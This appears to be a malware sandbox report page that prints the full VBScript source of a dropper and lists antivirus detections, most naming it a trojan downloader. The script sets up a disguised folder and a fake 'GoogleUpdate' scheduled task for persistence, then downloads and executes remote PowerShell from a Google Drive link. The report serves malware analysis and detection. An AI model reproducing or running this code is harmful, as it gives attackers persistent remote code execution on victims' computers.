popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
Sub ResContent(pth, cnt)
Set fso = CreateObject("Scripting.FileSystemObject")
Set txtFile = fso.CreateTextFile(pth,true)
'ioufvrs5drdswtdjgbiuge578tdrsewavcbfjhliu
txtFile.Writeline(cnt)
txtFile.close
End Sub
Sub PSCopy()
Dim FSO
Set FSO = CreateObject("Scripting.FileSystemObject")
'ioufvrs5drdswtdjgbiuge578tdrsewavcbfjhliu
FSO.CopyFile "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" , "C:\ProgramData\WindowsAppCertification\"
FSO.CopyFile "C:\Windows\SysWOW64\wscript.exe" , "C:\ProgramData\WindowsAppCertification\"
End Sub
Sub ProStart()
On Error Resume Next
Set scFSO = CreateObject("Scripting.FileSystemObject")
scFSO.CreateFolder("C:\ProgramData\WindowsAppCertification")
Set wm = GetObject("winmgmts:win32_process")
'ioufvrs5drdswtdjgbiuge578tdrsewavcbfjhliu
folderpth = "C:\ProgramData\WindowsAppCertification\"
ygvuhb = folderpth & "winappversion.ini"
powshellpth = folderpth & "powershell.exe"
wscriptpath = folderpth & "wscript.exe"
runpspath = folderpth & "runps.vbs"
confpth = folderpth & "conf.ps1"
rdxtfcesz = "On Error Resume Next:Set WshShell = WScript.CreateObject(""WScript.Shell""):Return=WshShell.Run(""cmd /c schtasks /create /sc hourly /mo 2 /tn """"GoogleUpdateTaskMachineUAB"""" /tr """"" & wscriptpath & " //b " & runpspath & """"""",0,true)"
'ioufvrs5drdswtdjgbiuge578tdrsewavcbfjhliu
runpscont = "On Error Resume Next:Set WshShell = WScript.CreateObject(""WScript.Shell""):Return=WshShell.Run(""" & powshellpth & " -ExecutionPolicy Bypass -Command " & confpth & """,0,true)"
confcont = "iex (New-Object Net.WebClient).DownloadString('https://drive.google.com/uc?export=download&id=1wKzc_xz_qdqDWnIrCl3KmMpXFFKaEsG8&confirm=t')"
ResContent ygvuhb, rdxtfcesz
ResContent runpspath, runpscont
ResContent confpth, confcont
PSCopy
wm.Create "wscript.exe //e:vbscript //b " & ygvuhb
End Sub
ProStart
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
FireEye Dropped:Trojan.Agent.ELAT
CAT-QuickHeal Clean
ALYac Dropped:Trojan.Agent.ELAT
Malwarebytes Clean
VIPRE Dropped:Trojan.Agent.ELAT
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
Symantec Trojan.Gen.NPE
ESET-NOD32 PowerShell/TrojanDownloader.Agent.FUK
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Dropped:Trojan.Agent.ELAT
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Dropped:Trojan.Agent.ELAT
Rising Dropper.Agent/VBS!1.E3C2 (CLASSIC)
Ad-Aware Dropped:Trojan.Agent.ELAT
Sophos Clean
Baidu Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.VBS.Dropper.zp
CMC Clean
Emsisoft Dropped:Trojan.Agent.ELAT (B)
Ikarus Clean
GData Dropped:Trojan.Agent.ELAT
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Agent.ELAT
SUPERAntiSpyware Clean
Microsoft Trojan:Script/Wacatac.B!ml
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX malware (ai score=89)
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Drp]
Panda Clean
No IRMA results available.